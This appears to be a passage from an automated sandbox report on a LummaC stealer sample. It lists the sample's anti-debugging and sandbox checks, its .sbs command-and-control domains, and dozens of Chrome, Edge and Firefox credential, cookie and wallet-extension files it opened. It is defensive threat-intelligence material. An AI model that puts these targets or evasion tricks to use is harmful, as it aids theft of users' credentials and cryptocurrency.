            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397497517.00000000056CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: file.exe, 00000000.00000002.1546637487.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxC
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: file.exe, 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036E470 LdrInitializeThunk,0_2_0036E470

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: file.exeString found in binary or memory: p3ar11fter.sbs
            Source: file.exeString found in binary or memory: 3xp3cts1aim.sbs
            Source: file.exeString found in binary or memory: peepburry828.sbs
            Source: file.exeString found in binary or memory: p10tgrace.sbs
            Source: file.exeString found in binary or memory: processhol.sbs
            Source: file.exeBinary or memory string: E4Program Manager
            Source: file.exe, 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: E4Program Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7748, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: file.exeString found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: file.exe, 00000000.00000003.1446094344.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: file.exe, 00000000.00000003.1446094344.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1446094344.0000000000F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
